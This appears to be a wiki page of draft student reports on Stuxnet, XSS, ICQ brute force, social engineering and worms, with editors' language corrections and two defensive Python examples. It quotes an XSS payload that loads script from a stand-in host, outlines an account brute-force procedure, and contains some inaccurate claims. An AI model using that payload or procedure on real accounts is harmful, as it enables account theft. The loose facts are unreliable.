12.04

Stuxnet virus. (corrected those errors and added information)

1. In June 2010 an unknown virus was detected not only on usual users’ computers, but also in big industrial systems. So, what was this virus?

2. win32/Stuxnet is a computer worm that infects computers running the Microsoft Windows operating system.

3. This virus uses four previously unknown vulnerabilities of the Microsoft Windows system (0-day) for infecting computers. Or rather, two of them were known, but they were poorly studied. These vulnerabilities are aimed at the virus dissemination with USB flash drives. Stuxnet escapes anti-virus programs with the help of real digital signatures. This is the first known computer worm which intercepts and modifies the flow of information between programmable logic controllers SIMATIC S7 and workstations of the SCADA system Siemens SIMATIC WinCC.

4. Stuxnet can be used as a means of unauthorized data collection (spying) and sabotage in the PCS (process control systems) of industry, power plants, airports, etc. When the worm started to work, it changed the frequency of the centrifuges and they were seriously damaged. As the virus did this, the station operators were fed the same traffic that Stuxnet had collected during the first two weeks, so they did not even notice that "something is wrong" until the car was, literally, torn into pieces. Finally, the most beautiful part of this procedure: the virus deactivated the «kill switches», the emergency circuit breakers, so it was not even physically possible to stop the controllers' work.

5. The virus was obviously created by a team of professionals, because:
 * The size of the source code of the virus is approximately 500 KB of code in assembly language, C and C++;
 * The purposes are too serious for a usual hacker;
 * The hackers were likely to have stolen the signatures of the Taiwanese firms MicronJ and RealTek. A strange fact, but the offices of these firms are in the same building in Shinchu. If this is not a mere coincidence, it means that someone physically entered the room, went to the appropriate computers and stole the keys. It’s not an amateur job.
 * "Definitely, there was some type of data exfiltration, not to mention the programming skills which are necessary for this kind of work," says Patrick Gardner, the director of the Symantec information security group. As for the skills of the Stuxnet authors, they were not just on top. The worm had 15 different modules and 5 hiding mechanisms built in, and two rootkits: one for the PC and one for the Siemens controller, which uses a custom-built operating system called Step7.

60% of infections were detected in Iran. So, there is an opinion that Stuxnet was created by Israeli security forces for stopping Iran's nuclear project.

6. A free tool to remove the Stuxnet virus can be found on the technical site of BitDefender, MalwareCity.com. Also, according to the Rainbow security company's report, the CodeMeter hardware devices, which are produced by the Wibu-Systems company, provide protection against the Stuxnet worm. Implementation of the CodeMeter technology allows developers to store on flash memory devices, which are made according to industry standards, not just the protected software product, but the operating system too (Windows XP Embedded, Windows CE, Linux, Windows XP, Windows 7, VxWorks, etc.). The hardware solutions in the form of the CmStick USB key and Compact Flash, Secure Digital or micro Secure Digital mobile cards make it possible to control the integrity of the supplied software package and its use based on licensing models, and to protect the know-how and critical code from cybercriminals.

7. Computer security specialists have detected signs of a new virus. The type of this virus is similar to that of Stuxnet, and this virus has jeopardized Iran’s nuclear program. This virus is named Duqu. Probably, Stuxnet and Duqu have the same source. Duqu was found by virus specialists of the Symantec company, which produces anti-virus software. "Unlike the Stuxnet virus, Duqu doesn’t contain the code to break into the control system and does not reproduce on its own," said the statement. In other words, this virus was created to steal information which can be used for diversions. Symantec Chief Technology Officer Greg Day told the BBC that Duqu is a very complex virus. "It's not a virus written by a teenager, it uses the most modern technology, and it means that Duqu was created by someone who meant to apply it for a very definite purpose," he said.

8. Detection of Stuxnet completely changed the situation in the field of computer security and forced many countries to strengthen the protection of their vital industrial facilities, particularly in energy and water supply. And if computer security experts all over the world do not improve methods of protection from such viruses, we will get a nuclear catastrophe like the Chernobyl accident or even much worse.

user:Kurorisu

P.S. New information from the following sources:

http://habrahabr.ru/post/123030/#habracut http://www.bytemag.ru/articles/detail.php?ID=18259

Tema, I've left, sorry :) 21.54

I pulled Lyosha's work back out. Why did it get deleted?

 In my report, I will tell you about Cross Site Scripting in social media. Cross Site Scripting is also referred to as XSS.

 This occurs when you allow HTML, or more often JavaScript code, to be input by a user and then displayed back by your website. __One place this is common is in a comment form.__ [this needs to be rewritten properly (I'll help if needed)] What most often happens is that a malicious user will try to write code that steals cookies from your site’s users, allowing him or her to discover username and password pairs or other information. Even worse, the malicious user might launch an attack to download a Trojan on a user’s computer.

 The first major worm to use Cross-Site Scripting was "Samy Worm1". On October 4, 2005, the "Samy Worm1" altered over one million personal user profiles on MySpace.com.

 As I said earlier, attackers using XSS attacks are trying to get a username and password. Suppose an attacker knows your username and password from your account on a social network. Thus, an attacker can gain access to your personal correspondence, which may well be confidential information. In addition, many users use the same password for both their social network account and their e-mail. Thus, a person who was subjected to an XSS attack risks losing access not only to his account on a social network but also to his email box.

 In social media, there are a lot of different forms of input, so they are most vulnerable to XSS attacks. Just to register in a social network, the user must fill in a lot of input fields, such as "e-mail", "name", "address", "interests", etc. Each of these fields is potentially vulnerable to XSS attacks. In many social networks, each user has a personal page where any user can leave a message. The attackers try to use this possibility: they can run malicious JavaScript code on the user's computer, only after he goes to someone's personal page.

 Preventing these attacks is as simple as calling the “htmlentities” function, which strips out all HTML markup codes and replaces them with a form that displays the characters, but does not allow a browser to act on them. For example, consider the following HTML: <script src='http://x.com/hack.js'></script><script>hack;</script> This code loads in a JavaScript program and then executes malicious functions. But if it is first passed through the “htmlentities” function, it will be turned into the following, totally harmless string: &lt;script src='http://x.com/hack.js'&gt;&lt;/script&gt;&lt;script&gt;hack;&lt;/script&gt; However, the browser will show the user the original version of the code.

 Despite the fact that the fight against such attacks is simple, XSS attacks are popular to __this day__ [these days]. In today's social networks, there are so many input fields that __provide all the vulnerabilities__ [unclear] for XSS attacks is almost impossible.

Aleksey Tsykarev

Here is my still rather rough draft... What do you think?

Looks fine :) I hope there will also be interesting illustrations or, perhaps, concrete examples of "terrible destruction" in social networks. :)
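An added example (not part of Aleksey's report) of the escaping step it describes, written in Python with `html.escape` standing in for “htmlentities”. It goes slightly beyond the report by also covering a value placed inside a quoted attribute, where an escaper that leaves quotes alone (as htmlentities does for single quotes under `ENT_COMPAT`) is not enough. The rendering functions and the attribute payload are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Payload quoted in the report, plus a constructed attribute-context payload.
BODY_PAYLOAD = "<script src='http://x.com/hack.js'></script><script>hack;</script>"
ATTR_PAYLOAD = "x' onmouseover='hack"  # constructed sample, not from the page


class ActiveContentFinder(HTMLParser):
    """Collects markup a browser would act on: <script> tags and on* handlers."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script-tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}[{name}]")


def active_content(page: str) -> list:
    """Parse rendered HTML the way a browser would and list what is live."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


def render_comment(text: str, escape: bool) -> str:
    """Hypothetical comment template: user text goes into the element body."""
    body = html.escape(text, quote=True) if escape else text
    return f"<div class='comment'>{body}</div>"


def render_profile_link(name: str, escape_quotes: bool) -> str:
    """Hypothetical template: user text goes into a single-quoted attribute."""
    value = html.escape(name, quote=escape_quotes)
    return f"<a title='{value}' href='/profile'>profile</a>"


if __name__ == "__main__":
    for label, page in [
        ("comment, raw", render_comment(BODY_PAYLOAD, escape=False)),
        ("comment, escaped", render_comment(BODY_PAYLOAD, escape=True)),
        ("attribute, quotes kept", render_profile_link(ATTR_PAYLOAD, False)),
        ("attribute, quotes escaped", render_profile_link(ATTR_PAYLOAD, True)),
    ]:
        print(f"{label:26} live markup: {active_content(page)}")
```

The third case is the one to watch for in review: the value contains no angle brackets at all, so escaping only `<`, `>` and `&` leaves the injected event handler intact.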

I would like to tell you about the most common of them, about brute force.

1. Unfortunately, the virtual world as a whole and the system of instant exchange of messages in particular are available to intruders. More often in IM the following types of illegal activity are carried out:
 * Theft of passwords to accounts of IM clients by search of passwords (brute force) or luring them __at__ [unclear] users by means of methods of social engineering.
 * The spread of malware.
 * Spam mailing


2. For brute force, hackers use some programs. These include the “brute” (a program __to hack__ [for hacking? after all, it is not the program itself that gets hacked]), a program to compile the proxy list and the UIN generator.


3. To start, a hacker creates a proxy list. You can find it online or create a proxy list through a program, such as “Forum Proxy Leecher”. Then we must get rid of “dead” proxies. A “dead” proxy is one whose ping is equal to 0. After that we start to use the UIN generator. This program allows us to create a list of the form “uin;password”, where uin is the ICQ number of the victim and password is a generated password. We then use our "brute". We load into the program the proxy list and the previously created list of “uin;password” pairs, and run it. The program takes a username-password combination, forms a query from it, and sends a request to the server using a proxy. The program then receives a response from the server and parses it.


4. The best protection against brute force is a complex password. And so the same should always have __primary__ [what is this about?] e-mail.

In general, there are a few rules. Here are the most common ones:
 * First, the user must be careful not to mindlessly click on a link in a received message.
 * You must have an antivirus installed with an updated database and a firewall that blocks unauthorized access to the network.
 * The user should use an anti-spam bot.

5. Do you need protection? I think the protection against IM attacks is needed by everyone who worries about the confidentiality and safety of the data in various social networks.


6. In August 2010 the new administration of ICQ decided to refuse __from primary an e-mail in advantage attach an e-mail.__ [This is unclear] The primary e-mail couldn't be replaced, while the owner of an ICQ number could __change attach e-mail__ [something is wrong here] if the old e-mail was lost. However, for protection against __fraud stealing__ [what is this?] numbers, in case of an __attach e-mail__ [??] change, a letter with confirmation came to the old mail address. Everything __would seem is provided__. [also unclear] But a bug was found in the system. It appeared that if you authorized on the ICQ.COM site, removed all data by pressing the button and then entered a new __attach e-mail__, the old attach e-mail was replaced by the new one without a confirmation arriving at it. In January 2011 the developers corrected this bug on the icq.com site. The mass theft of ICQ numbers ended.


7. As was already said, programs for instant exchange of messages are very attractive to different malefactors. In this connection the problem of distribution of malicious software through IM clients is rather sharp. New versions of __clients unknown contain for the time being vulnerabilities__ [I did not understand this bit at all] which can be found at first by hackers, and only then by the founders of the program. Such situations are fraught with mass epidemics. Besides, many users are disturbed by undesirable messages (IM spam).

Specific means of protection of IM clients don't exist at present; however, observance of the elementary rules of «computer hygiene», a correctly adjusted anti-spam bot, and also attentiveness and prudence allow users to successfully resist Internet swindlers and to quietly enjoy communication on the Network.

1334081800 Everything is fine, only the not very successful word combinations need to be polished
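The guessing run described in point 3 of this report spreads its requests across a proxy list, so a defence that counts failed logins per source address sees nothing unusual. An added example (not part of the original report) that contrasts per-address counting with per-account counting over a sliding window; the log format, addresses, UINs and thresholds are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed login log: timestamp, source address, account (UIN), result.
SAMPLE_LOG = """\
2012-04-10T21:00:01 198.51.100.7 100200300 FAIL
2012-04-10T21:00:03 203.0.113.20 100200300 FAIL
2012-04-10T21:00:04 192.0.2.44 555666777 FAIL
2012-04-10T21:00:06 192.0.2.15 100200300 FAIL
2012-04-10T21:00:09 198.51.100.91 100200300 FAIL
2012-04-10T21:00:20 192.0.2.44 555666777 OK
2012-04-10T21:00:31 203.0.113.8 100200300 FAIL
2012-04-10T21:00:40 192.0.2.200 100200300 FAIL
""".splitlines()


def parse(line):
    """Split one log line into (time, source address, account, result)."""
    ts, ip, account, result = line.split()
    return datetime.fromisoformat(ts), ip, account, result


def per_ip_alerts(lines, threshold=5):
    """Naive rule: flag a source address with many failed logins."""
    fails = defaultdict(int)
    for line in lines:
        _, ip, _, result = parse(line)
        if result == "FAIL":
            fails[ip] += 1
    return sorted(ip for ip, count in fails.items() if count >= threshold)


def per_account_alerts(lines, threshold=5, window=timedelta(minutes=5)):
    """Flag an account with many failures inside the window, whatever the source.

    Returns {account: sorted source addresses seen in the offending window}.
    """
    recent = defaultdict(deque)  # account -> (time, address) of recent failures
    alerts = {}
    for line in lines:
        ts, ip, account, result = parse(line)
        if result != "FAIL":
            continue
        failures = recent[account]
        failures.append((ts, ip))
        # Drop failures that have aged out of the sliding window.
        while failures and ts - failures[0][0] > window:
            failures.popleft()
        if len(failures) >= threshold:
            alerts[account] = sorted({src for _, src in failures})
    return alerts


if __name__ == "__main__":
    print("per-address alerts:", per_ip_alerts(SAMPLE_LOG))
    for account, sources in per_account_alerts(SAMPLE_LOG).items():
        print(f"account {account}: failures from {len(sources)} addresses")
```

An account flagged this way is a candidate for a temporary lock or an extra verification step, which holds up regardless of how many proxies the requests arrive through.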

Social engineering

1. What is social engineering?

Social engineering is a method of controlling the actions of a person without the use of technological tools. This method is based on the weaknesses of the human factor and is very destructive. Analyzing the causes and methods of hacking software, scientists have come to a very interesting conclusion, which is that approximately eighty per cent of the reason for this is the human factor. __A stunning experiment conducted British researchers.__ [here it is better to change to direct word order, otherwise the experiment conducted the researchers.] They sent employees of a large corporation a letter supposedly from their company's system administrator asking them to provide their passwords, because __is planned equipment check__. [direct word order is needed here too] __Responded to this letter, 75% of employees by investing in a letter to your password__. [and here the whole sentence is written in who knows what word order. :(] As they say, no comment. It is not that the people are so stupid, it's easy to program human actions.

2. The history of social engineering.

Very often, the "father of social engineering" __is the name of Kevin Mitnick__, ["Mitnick is called ... "] which is not entirely true. Mitnick was one of the first to apply the art of manipulating a person in relation to a computer system, hacking a person who works at a computer. After that, everything connected with the theft of information by manipulating the man became known as social engineering.

In fact, all the methods to manipulate a man have been known for a long time, and most of these methods came to social engineering from the arsenal of different intelligence agencies.

3. Social engineering today.

Today, the human factor in information security is more important than 20 years ago, when the Internet was not commercial and its users were only specialists. Social engineering often uses the Internet to obtain sensitive information or information which is of great value.

4. Why do malefactors use social engineering?

- This is easier than breaking a technical security system.

- Such attacks are not __computed__ [??] with the help of technical means of information protection.

- It is inexpensive.

- The risk is minimal.

- Works with any operating system.

- Effectively almost 100%.

5. Social engineering in the future.

According to many experts, the greatest threat to information security, both of large companies and of ordinary users, in the next decade will be more and more __improving__ [developed?] social engineering techniques used to break the existing means of protection.

Why do many researchers believe that social engineering will be one of the main tools of hackers of the XXI century?

The answer is simple. Because technical protection systems will be more and more improved, and the people __well as will__ [??] continue to be people with their weaknesses, prejudices, stereotypes, and will be the weakest link in the chain of security. You can put in the most advanced security systems, but still in your security scheme there is one very unreliable link: people. Because, as Albert Einstein said: «Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.»

The sources:

1) Maxim Kuznetsov, Igor Simdyanov "Social engineering and social hackers"

2) http://ru.wikipedia.org/wiki/Социальная_инженерия_(безопасность)

3) []

4) [] - examples of social engineering

Oleg. [a little boring without examples]

Nowadays computer worms are __very__ [you cannot intensify with this word: "wide" is already written there; in such cases one writes "extremely" or something equally emotional] widespread. Let’s talk about them.

//I changed the beginning// // Each of us has __ever__ ** [this is usually used in questions, e.g. Have you ever loved a woman? (there is a song like that :))) )] ** faced computer viruses, and there are viruses named “computer worms”. Let’s talk about them. // // A computer worm is a type of malicious program which is self-propagating through local and global computer networks. // // There are 2 main types of worms. The first one is a resident worm. It can infect a working program and stay in RAM, without damaging the hard disks. So you should restart your computer to neutralize this worm. The second type is a worm which saves its code on the hard disk after infection. Then it writes some keys in the Windows registry for its future launching. You can neutralize it only by using antiviruses. //

// Now some words about mechanisms of spreading. They are divided into 2 big groups. The first group uses vulnerabilities and administration mistakes of the software installed on the computer. These worms can spread independently; they choose and attack computers in an automatic mode. A good example of this type is the Morris worm; it is the first computer worm. The second type uses the principles of social engineering, so the user launches the malicious software by himself. This method is widely spread in spam mails, social networks, etc. A famous example of these worms is the virus ILOVEYOU or Love letter. // // Now, I would like to tell you something about this virus and about the Morris worm. //

// On November 2, 1988, specialists registered the first case of the appearance of a computer worm, which had paralyzed the work of six thousand Internet sites in the United States. The author of this virus is a student of the faculty of Computer science at Cornell University, Robert T. Morris. The epidemic arose because __he pointed too small number for a period of rewriting copy of the virus.__ [I cannot make sense of this phrase.] [At a certain interval the program would rewrite its copy one way or another. The too-small number that Robert set to describe this interval is what caused the world's first network worm epidemic.] ** The number that Robert had set for ... was too small. which caused ... ** A small logic error in the program code led to destructive results. Computers repeatedly caught the worm, and each additional __instance__ [example?] [http://lingvo.yandex.ru/instance/с%20английского/LingvoComputer/ here there is the meaning "copy"; though yes, one could simply write copy =)] ** [this will be clearer] ** slowed down the work of the computer, completely exhausting the computer’s resources. This worm used known vulnerabilities of mail servers and selection of passwords from a dictionary. The dictionary wasn’t very big: about 400 words, and in the 1980s information security was very weak, so it was simple to infect [what?] computers. The damage from the Morris worm was estimated at about $96 million. //

// On May 3, 2000, the virus ILOVEYOU was sent to mailboxes from the Philippines. In the subject of the letter it was written “ILoveYou”, and the script named «LOVE-LETTER-FOR-YOU.TXT.vbs» was added. When the user launched the script, the virus sent its copy to all the user’s contacts and made some malicious changes in the user’s system. The virus has infected more than 3 million computers worldwide. The damage which the worm caused in [I think it is better with the preposition] the world economy was estimated at $10-15 billion. So it was included in the Guinness Book of Records as the most destructive computer virus in the world. //

[I added a paragraph about the new worm] Stuxnet is a computer worm discovered in June 2010. This virus uses four previously unknown vulnerabilities of the Microsoft Windows system for infecting computers. These __vulnerabilities are aimed__ [the vulnerabilities are aimed?] at the virus dissemination with USB flash drives. The worm Stuxnet is a multipurpose tool of industrial espionage; it is intended to gain access to the operating system which is responsible for processing, data collection and management of industrial objects. In contrast to the majority of similar viruses, the main purpose of Stuxnet may be not data theft, but damage to industrial automation systems. Worms of this class can secretly be in the system in sleep mode and at a specified moment they give commands to damage the industrial equipment. [Well, that's a real James Bond, not a virus! If only there were some real example!]

I took the information from here: http://ru.wikipedia.org/wiki/Сетевые_черви http://ru.wikipedia.org/wiki/Червь_Морриса http://ru.wikipedia.org/wiki/VBS.LoveLetter

user:LenaBerezkina